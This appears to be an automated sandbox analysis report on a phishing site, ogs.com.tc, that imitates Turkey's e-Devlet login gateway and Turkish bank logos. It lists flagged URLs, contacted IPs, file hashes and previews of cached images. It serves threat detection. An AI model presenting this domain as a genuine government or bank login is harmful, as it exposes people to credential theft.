https://www.ogs.com.tc/assets/images/banks/ykb.jpg	false	Avira URL Cloud: phishing	unknown
https://www.ogs.com.tc/assets/images/banks/isbank.jpg	false	Avira URL Cloud: phishing	unknown
https://www.ogs.com.tc/assets/images/banks/garanti.jpg	false	Avira URL Cloud: phishing	unknown
https://www.ogs.com.tc/assets/images/banks/kuveyt.jpg	false	Avira URL Cloud: phishing	unknown
https://www.ogs.com.tc/assets/images/banks/albaraka.jpg	false	Avira URL Cloud: phishing	unknown
https://www.ogs.com.tc/assets/images/1.png	false	Avira URL Cloud: phishing	unknown
https://www.ogs.com.tc/assets/images/favicon-196x196.png	false	Avira URL Cloud: phishing	unknown
https://www.ogs.com.tc/assets/images/banks/anadolu.jpg	false	Avira URL Cloud: phishing	unknown
https://www.ogs.com.tc/assets/css/style.css	false	Avira URL Cloud: phishing	unknown
https://www.ogs.com.tc/assets/images/banks/odea.jpg	false	Avira URL Cloud: phishing	unknown
https://www.ogs.com.tc/assets/js/script.js	false	Avira URL Cloud: phishing	unknown
https://www.ogs.com.tc/assets/images/banks/fiba.jpg	false	Avira URL Cloud: phishing	unknown
https://www.ogs.com.tc/assets/images/banks/ing.jpg	false	Avira URL Cloud: phishing	unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
142.250.185.228	www.google.com	United States	15169	GOOGLEUS	false
239.255.255.250	unknown	Reserved	unknown	unknown	false
185.216.70.93	ogs.com.tc	Germany	43659	CLOUDCOMPUTINGDE	false

Private

IP
192.168.2.4
192.168.2.5

General Information

Joe Sandbox version:	40.0.0 Tourmaline
Analysis ID:	1447545
Start date and time:	2024-05-26 00:16:17 +02:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 3m 19s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	browseurl.jbs
Sample URL:	https://www.ogs.com.tc/
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	9
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Detection:	MAL
Classification:	mal72.win@16/86@8/5
EGA Information:	Failed
HCA Information:	Successful, ratio: 100% Number of executed functions: 0 Number of non-executed functions: 0

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
Excluded IPs from analysis (whitelisted): 142.250.185.195, 216.58.212.174, 64.233.184.84, 34.104.35.123, 172.217.16.202, 142.250.184.195, 20.114.59.183, 199.232.210.172, 192.229.221.95, 20.242.39.171, 20.166.126.56, 142.250.186.163
Excluded domains from analysis (whitelisted): fonts.googleapis.com, fs.microsoft.com, accounts.google.com, fonts.gstatic.com, slscr.update.microsoft.com, ctldl.windowsupdate.com.delivery.microsoft.com, clientservices.googleapis.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com, fe3.delivery.mp.microsoft.com, clients2.google.com, edgedl.me.gvt1.com, ocsp.digicert.com, ocsp.edge.digicert.com, glb.cws.prod.dcat.dsp.trafficmanager.net, sls.update.microsoft.com, update.googleapis.com, clients.l.google.com, wu-b-net.trafficmanager.net, glb.sls.prod.dcat.dsp.trafficmanager.net
HTTPS proxy raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
Not all processes where analyzed, report is missing behavior information
Report size getting too big, too many NtSetInformationFile calls found.

Simulations

Behavior and APIs

⊘No simulations

LLM Input / Output

Input	Output
URL: https://www.ogs.com.tc/ Model: Perplexity: mixtral-8x7b-instruct	{ "loginform": false, "reasons": [ "No input fields for username or password are present in the text.", "No submit button is mentioned in the text." ] }
e-Devlet KaplS1 Kimlik Dogrulama Sistemi Giri Yapllacak Adres www.turkiye.gov.tr Giri; Yapllacak Uygulama e-Devlet KaplSl Alternatif alBaraka O AKBANK DenizBank Anadolubank HSBC TRKiYE evam et BANKASI odeabank Pttbank KuuEYTTRH Sekerbank$ TEB Trkiye Finans YamKredi Vak1fBank ZiraatBank @ 2024 Ankara - Tm Haklarl Saklldlr Gizlilik ve Gvenlik HIZII Czm Merkezi

Input

Output

URL: https://www.ogs.com.tc/ Model: Perplexity: mixtral-8x7b-instruct

{
"loginform": false,
"reasons": [
"No input fields for username or password are present in the text.",
"No submit button is mentioned in the text."
]
}

e-Devlet KaplS1 Kimlik Dogrulama Sistemi Giri Yapllacak Adres www.turkiye.gov.tr Giri; Yapllacak Uygulama e-Devlet KaplSl Alternatif alBaraka O AKBANK DenizBank Anadolubank HSBC TRKiYE evam et BANKASI odeabank Pttbank KuuEYTTRH Sekerbank$ TEB Trkiye Finans YamKredi Vak1fBank ZiraatBank @ 2024 Ankara - Tm Haklarl Saklldlr Gizlilik ve Gvenlik HIZII Czm Merkezi

Joe Sandbox View / Context

IPs

⊘No context

Domains

⊘No context

ASNs

⊘No context

JA3 Fingerprints

⊘No context

Dropped Files

⊘No context

Created / dropped Files

Chrome Cache Entry: 100

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	RIFF (little-endian) data, Web/P image, VP8 encoding, 500x200, Scaling: [none]x[none], YUV color, decoders should clamp
Category:	dropped
Size (bytes):	3052
Entropy (8bit):	7.910068716360241
Encrypted:	false
SSDEEP:	48:fDiNIVkaNj3FlfwBxQKrNrj0gfjE3kXCyRsdjsnsRgi8DP1wyLZME1FIam+z:mNIVNNj3XfwBxrN0Y2kS8slsnKgiG6E/
MD5:	5EFD7FB621B6E039549923F7E1FD4A17
SHA1:	043DFE10E2D4D90A72E5624166EC961BE7B20B3A
SHA-256:	6DF70210D474FD90F14D08BB9DBC66C0411FB1F85F503DCD62916FEC271A2C5A
SHA-512:	D2A0115E24BCB77962ADAA408BBA4D846CA77C6CF391AF9F34E1888B31FEC9E91FA04EBF3BBA256A7963B05C10A6AEB9049484319D6C74757155C0BB20EC411D
Malicious:	false
Reputation:	low
Preview:	RIFF....WEBPVP8 .....G...*....>I$.F".!!$q.P..en.v...... ;.(.J........E.......j\|......?0.......O...7.../p......j.......c.........?...}.z..:....;..........._.?...?...........X..../.....c.......Br.......P.-.&.....s.pK...^..(...../R..D....BJ"y.....%.<.....P...qypB.(IDO8..!z.$.'.^\..J.Q../-.P.i..e..%.....z..V..-...8#p:.h..M..........H...0........rz...2...n.pB.(D..Q..M...L.Bd.T..f..T...c.......n..BO...-._..A....H!.-.....2....Ow..../8y...)w....[.....B.(....p.-w.xS.CA?YH.M\m-...]%W"...^...h..".\|.r...,3 ....X.k'.s.!z.$.V-...(...../R..D....BJ"y.....%.<.....P...qypB.(IDO8..!z.$.'.^\.......X................m.{.e...U....<.:@.{.e...>...0J.qT..J..m..U$..E...O..4.@7=Z......;T..\.mI...\|V.\-KjS2Z..d..d.P.S..."Z...3M......"......h..X0..t.}.....RD.....y...x..Bp.hCN0........o...d............H..'?.en..\|O\T.md..#..P_.<.(H..85.?.9.}E.n..N+m...l...Q..l.......A..a.6........Rh.;.O.....X.[....e.@.....z..S\|...,.B....>P.Gp.......(.^.al...B?.F+......o.0P..>.j....V.]G.F.'.1...

Chrome Cache Entry: 101

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	RIFF (little-endian) data, Web/P image, VP8 encoding, 500x200, Scaling: [none]x[none], YUV color, decoders should clamp
Category:	dropped
Size (bytes):	5774
Entropy (8bit):	7.955781932195618
Encrypted:	false
SSDEEP:	96:AyFOrILQx/1XU3fpnSws4st9BG1bshnP8Jk6jf3o6f6VA6bSEf0h2lI2UO3ANANd:jUcL0/1cpnOb4shnP8W43nLEf0h+UO35
MD5:	7995B5E53599897563011D13AA49EA5F
SHA1:	F56C2F94BFB6CD60D11D278E0FBEAC6703590E72
SHA-256:	D51FF84F13144F25DDC1DAF353E519C9541EC6BE63DA2C25FB3868112064AF32
SHA-512:	459E1E81B58EBB0C5A8B6C17938AFC8B906F1A6CCE51C17BD5A38A929C4AAD548465AC7C3F1B804AD484FA4C6BECE01EBCB786E947BFD624E6969C41623AD429
Malicious:	false
Reputation:	low
Preview:	RIFF....WEBPVP8 z....h.......>I".E..!.X\|.(....p.......W...j......t.i...w`....?.v..{..O......`/...?...~..;.......+.......s?..?....u.~.{..........N.......s.........~>x..W.{......./4..}t./.o...vx..+...O.....\|.......N.]....{=....Z.7..........#........<.~w._...?.....?..{.....o.....3.... &.{w/C.n..a...=.....r.0..^.......z.{w/C.n..a...=.....o..t.. ..LHd.B.....$.2.M.,..3...sn...>C..............p\|<>.....>....j.$.__....z..1..q......~9..).G.8..."F.^#...I....#.kyk%"....tyg..".E>.....E." iV...~;..sC..!..!.4.!....as.c.$cx.....j../..n.......J.=.$..b.C.t9..qp&..Vd...;.Xl.v^ZV{...7...p.[.".oJ..3.{W.A...Q.t.<..(..2N..k.U..."C.N."#.......Bir..."%..0j...w.r...[....%.>..w......n,......OF..4V... .K...:...u.y1.7....n..ue..`^Br....f...-.4.G<...1=..Z.7D.A&fi...v.2.M.j>..;3.O..k......z.zB...n..a...=.....r.0..^.......z.{w/C.n..a...=.x................x_.....jt..S.e.ch.2.enu........).-@..^..)..f.?..N.m..>..E...f...t0R..bh5........[..-....x..CG.(}.S.p+=Y.b.~.

Chrome Cache Entry: 102

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	RIFF (little-endian) data, Web/P image, VP8 encoding, 500x200, Scaling: [none]x[none], YUV color, decoders should clamp
Category:	downloaded
Size (bytes):	4904
Entropy (8bit):	7.94930581705637
Encrypted:	false
SSDEEP:	96:M6opqi3R4YgHM9ddzxgiaqkElcwTUwFySe2v8iwAohflvcrKfn9z1k:M6oBaP+zxgiaqkEgw/eo8tvPqKfn9Rk
MD5:	A82F67A8BCFFF4EA7793BB3FCC00CB4D
SHA1:	DECC78E3F9341338EB0AB9757735E2338A5DE451
SHA-256:	871657EF72C4641D784288FBCCBC14775B72A07437C69E2E29D7A2AE0BED9F73
SHA-512:	10C19D9A4BFCB1033F1AE5DEBF41821597A10FA83896C73C1CABF421F441150D9A3037B1E2E1E0F8F0AB77515346201A17ED89652918F63EEE86E89387E6EA18
Malicious:	false
Reputation:	low
URL:	https://www.ogs.com.tc/assets/images/banks/halk.jpg
Preview:	RIFF ...WEBPVP8 .....a.......>I$.F".!.!.Y.P..en.uK..~...RN....{.O.]........v......=.<K.......~......w...`?...:G.....6...S...............=........Y...7.7.o....._..P........................?..T......N.3..._.?e.,...!....c..........?.c...}..._._X...E}....y.?.O...~!?J.m..........................>...?......w.7...#..C...L..!.}...h...:....}...h...:....}...h...:....}...h...:.....y....L.A....2. ..%0P`.y...\|@..I..Eq.........T.'.c...B.iA......D..F......\|.9....[..+9.). ...>u....`l..U..$~c...".c./szwR........-..>.&......pH....W.cR....1..."U..66}...9.1?.Ss.M..w.%G..ZUq..6.....1.E....Ku.t...%..S.m...s.5...;.:...`d....s......`....C.eK...........-.......qDe. D..%?:...&3.G.+....C...W..........r..A..u....2}...!C-%...p....kk6.q.S..\|;.uc..X.GV>...uc..X.GV>...uc..X.GV>...uc..X.GV>...t.....%........DS...1b..>X.......\|.)..<.\j....`t.D....L..#..0.e..v..L!......xC..$.B.W...c..#.:....X...'e.)B.X`...I.....]\'Q..Y:R.R.t.Xe.....c...U.A..A.2.(4...}.^.V..h541./.........

Chrome Cache Entry: 103

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	SVG Scalable Vector Graphics image
Category:	dropped
Size (bytes):	8746
Entropy (8bit):	3.948607010097119
Encrypted:	false
SSDEEP:	192:Ww8o3Nd5aQk6tjbzOt1SSVZ7u5esh07S01XxnUF:W+3rMCjGt1SSHMesG7D1hnUF
MD5:	E5743937C99F16C9355FAEB1F0F43747
SHA1:	FBC44E8BB5CFD1C55FC7D04B844802B772C197B7
SHA-256:	39966EC7EEA8F508184CEF9F98895A0E8D74E3328A43CC8A93C528CFCA888691
SHA-512:	4A948D98FAD13E2DEFE50BAD24B6A681E79C6A0C6FB373AAF87B37F167B9AA25B51A305E79690B6865DDE80547AADD6A5A06704553AC0F716E878243071C8ADF
Malicious:	false
Reputation:	low
Preview:	<svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 672.5 100"><path fill="#E6E6E6" d="M86.1 26.4c-.1-1-.9-2-2-2.3l-38.3-13c-.6-.2-1.4-.2-2.1 0l-38.4 13c-1 .3-1.9 1.2-2 2.3C.6 52.5 5 72.3 16.8 85.5 28.9 98.7 44 99.8 44.7 99.8h.4c.6 0 15.8-1 27.8-14.3C84.6 72.3 89 52.4 86.1 26.4z"/><path fill="#FFF" d="M87.2 17.1c-.1-1.1-.9-2.2-2-2.5L46.1.4c-.6-.2-1.4-.2-2.1 0L4.8 14.6c-1 .3-1.9 1.3-2 2.5-3 28.5 1.5 50 13.6 64.2C28.7 95.8 44.1 97 44.8 97h.4c.6 0 16.1-1.1 28.4-15.6 12-14.3 16.6-36 13.6-64.3z"/><path fill="#EA212E" d="M82.2 20.2c-.1-1-.8-1.9-1.7-2.2L45.6 5.4c-.5-.2-1.3-.2-1.8 0L9 18c-.9.3-1.6 1.2-1.7 2.2-2.7 25.3 1.3 44.4 12 57.1C30.2 90.2 44 91.2 44.5 91.2h.4c.5 0 14.3-1 25.2-13.8 10.7-12.8 14.7-32 12.1-57.2zM31.2 82c-.5-.3-.8-.5-1.3-.8 9.3-2 16.9-5.9 23.8-10.1-6.2 4.1-13.8 8.3-22.5 10.9zm44.7-42.7c-1.3 2.8-2.7 5.1-4.5 7.5-3.6 4.5-7.8 8.2-12.6 11.5-4.8 3.4-10 6.3-15.6 8.8-2.7 1.2-5.8 2.4-9.2 3.2-3.1.8-7.1 1.6-10.7.8-1.4-.3-2.6-.6-3.6-1.3-1.2-1.9-2.2-4-3.1-6.2.1-2.7 1.5-5.1 2.7-7.1 3.1-4

Chrome Cache Entry: 104

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	RIFF (little-endian) data, Web/P image, VP8 encoding, 500x200, Scaling: [none]x[none], YUV color, decoders should clamp
Category:	downloaded
Size (bytes):	5774
Entropy (8bit):	7.955781932195618
Encrypted:	false
SSDEEP:	96:AyFOrILQx/1XU3fpnSws4st9BG1bshnP8Jk6jf3o6f6VA6bSEf0h2lI2UO3ANANd:jUcL0/1cpnOb4shnP8W43nLEf0h+UO35
MD5:	7995B5E53599897563011D13AA49EA5F
SHA1:	F56C2F94BFB6CD60D11D278E0FBEAC6703590E72
SHA-256:	D51FF84F13144F25DDC1DAF353E519C9541EC6BE63DA2C25FB3868112064AF32
SHA-512:	459E1E81B58EBB0C5A8B6C17938AFC8B906F1A6CCE51C17BD5A38A929C4AAD548465AC7C3F1B804AD484FA4C6BECE01EBCB786E947BFD624E6969C41623AD429
Malicious:	false
Reputation:	low
URL:	https://www.ogs.com.tc/assets/images/banks/deniz.jpg
Preview:	RIFF....WEBPVP8 z....h.......>I".E..!.X\|.(....p.......W...j......t.i...w`....?.v..{..O......`/...?...~..;.......+.......s?..?....u.~.{..........N.......s.........~>x..W.{......./4..}t./.o...vx..+...O.....\|.......N.]....{=....Z.7..........#........<.~w._...?.....?..{.....o.....3.... &.{w/C.n..a...=.....r.0..^.......z.{w/C.n..a...=.....o..t.. ..LHd.B.....$.2.M.,..3...sn...>C..............p\|<>.....>....j.$.__....z..1..q......~9..).G.8..."F.^#...I....#.kyk%"....tyg..".E>.....E." iV...~;..sC..!..!.4.!....as.c.$cx.....j../..n.......J.=.$..b.C.t9..qp&..Vd...;.Xl.v^ZV{...7...p.[.".oJ..3.{W.A...Q.t.<..(..2N..k.U..."C.N."#.......Bir..."%..0j...w.r...[....%.>..w......n,......OF..4V... .K...:...u.y1.7....n..ue..`^Br....f...-.4.G<...1=..Z.7D.A&fi...v.2.M.j>..;3.O..k......z.zB...n..a...=.....r.0..^.......z.{w/C.n..a...=.x................x_.....jt..S.e.ch.2.enu........).-@..^..)..f.?..N.m..>..E...f...t0R..bh5........[..-....x..CG.(}.S.p+=Y.b.~.

Chrome Cache Entry: 105

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	SVG Scalable Vector Graphics image
Category:	downloaded
Size (bytes):	8746
Entropy (8bit):	3.948607010097119
Encrypted:	false
SSDEEP:	192:Ww8o3Nd5aQk6tjbzOt1SSVZ7u5esh07S01XxnUF:W+3rMCjGt1SSHMesG7D1hnUF
MD5:	E5743937C99F16C9355FAEB1F0F43747
SHA1:	FBC44E8BB5CFD1C55FC7D04B844802B772C197B7
SHA-256:	39966EC7EEA8F508184CEF9F98895A0E8D74E3328A43CC8A93C528CFCA888691
SHA-512:	4A948D98FAD13E2DEFE50BAD24B6A681E79C6A0C6FB373AAF87B37F167B9AA25B51A305E79690B6865DDE80547AADD6A5A06704553AC0F716E878243071C8ADF
Malicious:	false
Reputation:	low
URL:	https://www.ogs.com.tc/assets/images/edkkds.svg
Preview:	<svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 672.5 100"><path fill="#E6E6E6" d="M86.1 26.4c-.1-1-.9-2-2-2.3l-38.3-13c-.6-.2-1.4-.2-2.1 0l-38.4 13c-1 .3-1.9 1.2-2 2.3C.6 52.5 5 72.3 16.8 85.5 28.9 98.7 44 99.8 44.7 99.8h.4c.6 0 15.8-1 27.8-14.3C84.6 72.3 89 52.4 86.1 26.4z"/><path fill="#FFF" d="M87.2 17.1c-.1-1.1-.9-2.2-2-2.5L46.1.4c-.6-.2-1.4-.2-2.1 0L4.8 14.6c-1 .3-1.9 1.3-2 2.5-3 28.5 1.5 50 13.6 64.2C28.7 95.8 44.1 97 44.8 97h.4c.6 0 16.1-1.1 28.4-15.6 12-14.3 16.6-36 13.6-64.3z"/><path fill="#EA212E" d="M82.2 20.2c-.1-1-.8-1.9-1.7-2.2L45.6 5.4c-.5-.2-1.3-.2-1.8 0L9 18c-.9.3-1.6 1.2-1.7 2.2-2.7 25.3 1.3 44.4 12 57.1C30.2 90.2 44 91.2 44.5 91.2h.4c.5 0 14.3-1 25.2-13.8 10.7-12.8 14.7-32 12.1-57.2zM31.2 82c-.5-.3-.8-.5-1.3-.8 9.3-2 16.9-5.9 23.8-10.1-6.2 4.1-13.8 8.3-22.5 10.9zm44.7-42.7c-1.3 2.8-2.7 5.1-4.5 7.5-3.6 4.5-7.8 8.2-12.6 11.5-4.8 3.4-10 6.3-15.6 8.8-2.7 1.2-5.8 2.4-9.2 3.2-3.1.8-7.1 1.6-10.7.8-1.4-.3-2.6-.6-3.6-1.3-1.2-1.9-2.2-4-3.1-6.2.1-2.7 1.5-5.1 2.7-7.1 3.1-4

Chrome Cache Entry: 106

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	RIFF (little-endian) data, Web/P image, VP8 encoding, 500x200, Scaling: [none]x[none], YUV color, decoders should clamp
Category:	downloaded
Size (bytes):	3510
Entropy (8bit):	7.923209159875537
Encrypted:	false
SSDEEP:	96:H/Dv4WxcN41DkQKrPidlfMhpziZcGnWyQ4Z5DOp1qoptEjm2NavQ:H/bOkhKrqr0P83Z56zpp2fcQ
MD5:	43C944FA568502BAEDCCE9455D812C3C
SHA1:	D9B1CFCAD1A4AF9CE14AF46B37D91DD8551AE9BC
SHA-256:	EE9DF8FAF35A0992E4DBFFC2DF4BB02FD6691184766D2915CF2E19BC4E906FE3
SHA-512:	C2CB9BFB37849BE3DEE22092BA08DC270A8F80070A2F55345D47CC209F4A71E25D1FAC83699D3016CF4A3EB271195A0FAD147D88E41CB955787B9F312A68413E
Malicious:	false
Reputation:	low
URL:	https://www.ogs.com.tc/assets/images/banks/ziraat.jpg
Preview:	RIFF....WEBPVP8 .....R.......>I$.F".!.!5..P..gn.v....K.O}..wgn:t.\|.o._._.;H..~...................p....}.?Rz...?[}4.a...d.k...X~..P...._.?...............OS...z.....G._.\|......G......Z.Xq.i.`^.\|..'....M{......O..A...........?.~`>....../.....^... ?p.-@.z....U.A.....T...._..P...-~@U@.z....U.A.....T...._..P...-~"G.y.{-../?.......U.A.....S.m.I...`.Q.m..N......P5.@.1.H9..y7.~.9..9..(?W.......+o..ky.LK... z..v.).U.A..Y7.....'-..........A.B.z.r....z.6V)6,8........3...jR.j.c....CuW...5..'.p.....R.M....-~>.".............M[....Q....j..xh5."..:.+.9..[.g.!....\Q?WY.....Rv"...fK6a.......K_..P..S..s..#.5 .h.T...._..P...-~@U@.z....U.A.....T...._..P...-~@U@.z....U.A...................@L..mt....!..H-{....t._.P......}Es.m.{u......$.o.......M..H......;.p......{..H]..~X!.].nk+.O....}... ..C.....s?....F....XI.....+.y..2..-P>....2..wE.4..)75(..4....&...?...2.rI..WCw.I.1.....3.Q.t....t...F.........rWf.....Y;.~.'B4/."..(.K..........?..p:.....H.'......Ju..p..i..]..)a

Chrome Cache Entry: 107

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	JPEG image data, Exif standard: [TIFF image data, big-endian, direntries=7, orientation=upper-left, xresolution=98, yresolution=106, resolutionunit=2, software=Adobe Photoshop 23.5 (Windows), datetime=2022:09:28 03:31:15], progressive, precision 8, 500x200, components 3
Category:	downloaded
Size (bytes):	36954
Entropy (8bit):	7.6584790869372155
Encrypted:	false
SSDEEP:	768:zcoO/xcoGHVKZnU+ytlJjIWlBc86nXHgGbikavTDupeJMKK:zcoUcoGHw1/y3lLLCgGuhDTMJ
MD5:	55EAC6447192DC06174FFD6FC925B12C
SHA1:	EB34EA301401FDAAE5C50D52E2F11934738E98F5
SHA-256:	652F9B7EF8CD5A0C66CB112CE2B7EB8EA7F9332D13552C7E82E9C7E5F532E075
SHA-512:	54A0E0B2D0A1AC3F154DDBFFCBE366C0EA38A0BB6E2F84CC7EE30B2248DBDF0039C7C43B5D88DBA5C8F7A15EE8D986D25F74BDCE0B275B0C815EA5357DE825BD
Malicious:	false
Reputation:	low
URL:	https://www.ogs.com.tc/assets/images/banks/fiba.jpg
Preview:	.....{Exif..MM..............................b...........j.(...........1.........r.2...........i....................'.......'.Adobe Photoshop 23.5 (Windows).2022:09:28 03:31:15........................................................................."............(.....................2...........A.......H.......H..........Adobe_CM......Adobe.d.................................................................................................................................................@...."................?..........................................................................3......!.1.AQa."q.2.....B#$.R.b34r..C.%.S...cs5....&D.TdE.t6..U.e...u..F'...............Vfv........7GWgw........................5.....!1..AQaq"..2.....B#.R..3$b.r..CS.cs4.%......&5..D.T..dEU6te....u..F...............Vfv........'7GWgw.................?..T.I%)$.IJI$.R.I$...I%)$.IJI$.R.I$...I%)$.IO...T.I%)ef}`.....i...........[.........P....rG."..*...g.d....1M...N.N..s.$.9.e..pi<....=[1.......v2.6.....

Chrome Cache Entry: 108

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	Web Open Font Format (Version 2), TrueType, length 35328, version 1.0
Category:	downloaded
Size (bytes):	35328
Entropy (8bit):	7.994332301165168
Encrypted:	true
SSDEEP:	768:ref/0cWmx/+kx+VzykFOgg80zBQd0Q8LdDY0NC+GJor:6McWmx/TIykFPctQdi0or
MD5:	7670DBA29AA2A1560C5D711EA6F6B369
SHA1:	6A2A620D2972F139C804C5A8363C91EB1A7595F6
SHA-256:	ADFA45260A1306CB5FEFC1F17C1B5E7B61135534A82BF1B8E3D0540AF7E07E3B
SHA-512:	CDA686C9E3AF62B9D13AF3C71F79184E4C57A06B8AF067316C70A5A56CB7A62C319E9F3B81DC57B58B052672126F2F019B32C687F05324D1C12F5664BCE9F7BA
Malicious:	false
Reputation:	low
URL:	https://fonts.gstatic.com/s/opensans/v40/memvYaGs126MiZpBA-UvWbX2vVnXBbObj2OVTSGmu1aB.woff2
Preview:	wOF2...............\..............................@.....\|?HVAR.D.`?STAT.$'...J+...\|.../V.....\.i....0....6.$..,. ..~.........'.sp.V.m..^.R...C..U.1..z...@P.Q...g&.14.>m.Q.m...rG.[^"ji[o.bW"plhM....(:......D'%.G.D^=j.).1....8 .............n.2.....a...a_t..<.......mJe.k...Mer}!...2&RY.9.KB....3.L...k.Q.Y."..d.7r.F!_.Z...~\.$[....D..<...b^..4~.....3..#.o2.\k<...;D....m.....;.p.......E2j..5ptHK...9$K....l.>.3..i.....rc....nr...]i...l..%d.B.2.d..'.uwtw.qrk...wn.wo...nx<.....}...O..v..rk....cgu...].$.....9.D.{._..cJ)m..d`..<~6./i$...;...*B.../..`........7...R.yP....l.....x....OF.... ..&... b. ...w..o.V"..1.../....3..)V.$'.X...f#..0ic..[...%......{_O.=.M..=o....L.cv.6........F..9 M....5Y.N.0.4...g....b....k.^......&......?.....$.@.:.J.2..v:...>%..C...>f.4..3e.6..4.`I..D..B.Q.Ou..J._..M.."2...x;G.\}U.HlbG..D.'.p.....D.'.:..G..h`........I.H...-o...~W.j.....e.\.d..;...m.?.)q...7k.R.....y..(.IX.=r7....g........>v.f........'.....L%...:%ChZ\|..[h>..dz.[.][@.

Chrome Cache Entry: 109

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	PNG image data, 196 x 196, 8-bit/color RGBA, interlaced
Category:	downloaded
Size (bytes):	38550
Entropy (8bit):	7.976146059619022
Encrypted:	false
SSDEEP:	768:WfsaAn77REMI0/oHfogxTtPbRk/NQ5QgKeAsL9NQl/y2Z5tQzb57:WfsaA/REMIYoHf5BtNWgU+QB/5a7
MD5:	3290DEB61511EEE631E455D4D4C421CD
SHA1:	44C7B59E98A30682100ECE6C8672715F3CFDE979
SHA-256:	CB0374314E49BE2700C9F7C6C59BE3248D2658CC0F426FAED041928712B26475
SHA-512:	E92A89601EEC2916AE04AAA2C0CB82B4E141023E0A5E61BA74A67C8A38B237BF168FDEC13A324487E599D04D4E133D5D5DC9CE1EBA0052EA33924F96F9902DD5
Malicious:	false
Reputation:	low
URL:	https://www.ogs.com.tc/assets/images/favicon-196x196.png
Preview:	.PNG........IHDR.....................gAMA......a.... cHRM..z&..............u0...`..:....p..Q<....bKGD..............IDATx...yx.......g..B..B$aMX............\.T..p........7@.....AD.T.T.}..$.d2......e.{.{z.......d....S.N...c"..........gVIW...gj..3.Fl{`R...\|=.... 0........,..&..a.U....H.._Ie..T._../$...""2.C{ Z\|..Qd.N./"..1...d.........1......L..!"..kn O..DDT.N......W.....k...=V..o.=...T^.....H.pB..E..FO..0...e(B.nD7.9..B!.0O....D.0.4...@..l..)r.cT..{.....0.(..W..}.....^D.w.G.2.(G...#...^\|..@7h...d=...\|.N..."o.^#..........IDT.PTFFF..nu.j..\|y......."..@S.X.\|...W\.c.......WJ%".$)T^PH...@....A....SYA...9r......,..B?......c2.H..h.G..0..3.)?l.....e.MMI..Y.o.V....j.....$.z.....O.FE.E.....$I.)I.)......A.\....i.!......`.....Bv}4....Ah..(.s....[.I......6.8........"W..G.g.8.......1.....w^o.4..>..._Zr....@d....(.....8.R..o.}...f .QR....x..`.I...T..KDD?......0!.8._........=....p..P.BN.do^.A..r...ce..e.(Mp.`.A...>...[..I;5..-.oL...".i)D.S

Chrome Cache Entry: 110

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	RIFF (little-endian) data, Web/P image, VP8 encoding, 500x200, Scaling: [none]x[none], YUV color, decoders should clamp
Category:	downloaded
Size (bytes):	5268
Entropy (8bit):	7.94280823443583
Encrypted:	false
SSDEEP:	96:pd9cVC1HAbPq1GBgYmJbtt3I0yjjFvH7Oj61RdEv5fczq78cz21PQj:WVCJ12HmJp6tbS6bdExfAw24
MD5:	34CDE1A4D95782DC8A404F3B7A22707C
SHA1:	11ACDBECC2E820EA75A21EFC9D19C7F3EBB62631
SHA-256:	CF164D0F6DBDD0F6AA11BA954189B8DCF4CD07AD066083633986C176FC0019CD
SHA-512:	1194C6EE637E6530B64FB3C1C2D93FE76533F3A79648D43778EDD4CA5C0FDFB1E437A63CFA050D0E4986DE41A17F009766C409FA7A42C5BAE0A348778EB04BE6
Malicious:	false
Reputation:	low
URL:	https://www.ogs.com.tc/assets/images/banks/garanti.jpg
Preview:	RIFF....WEBPVP8 ....0c.......>I$.E..!.Z..(....p...o~.g.....~..\|.<{....=......N..I.....c...3.....@....z.....u>................?..'./.o..%.v..2....?"........_{?..7.O._....~.........N.;...;..V...........'......e...[...._.=..1.....o.o._.?..........((.L.T[/;s.L.T[/;s.L.T[/;s.L.T[/;s.L.T[/;s.L.T[/;s.L.T[/;s.L.TZzLo&.X...&...AU...:...E........R.%P.M.`.._.....r..xZ..B.\|..........).[..d.........e[...R.....u......5...J......+\.?..o0&.....RD....,s^4..}.?.-.\....TZzkF....S).x.&. ..K.P..(.#Y.......-..{.r.......[. ...h........WF..........;..GJ..O.qSn..R,....b..&Q..@..=...Z.~uV'.Mp..;.#.jlE.^..,.2..Z.r.....!.............J.....p2......b./.N...n..?...B.)..d...Jb..2.!Yc56..9<d...gD..sa....3.ma.k.v.3.LR`-..q ...x&6......I...}..:...E..:...E..:...E..:...E..:...E..:...E..:...E..:...............t.....q... N..Q.v.A...:z..(.....zNS.o.!.7.......h-F.s..R~\|...7.F._....?tP..+.....62.u.]y\|.M..^.L$`2\{..!..{.....W......~..^.{\mY.,e^........;.W.p...a..*

Chrome Cache Entry: 111

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	JPEG image data, Exif standard: [TIFF image data, big-endian, direntries=7, orientation=upper-left, xresolution=98, yresolution=106, resolutionunit=2, software=Adobe Photoshop 23.5 (Windows), datetime=2022:10:01 18:05:41], progressive, precision 8, 500x200, components 3
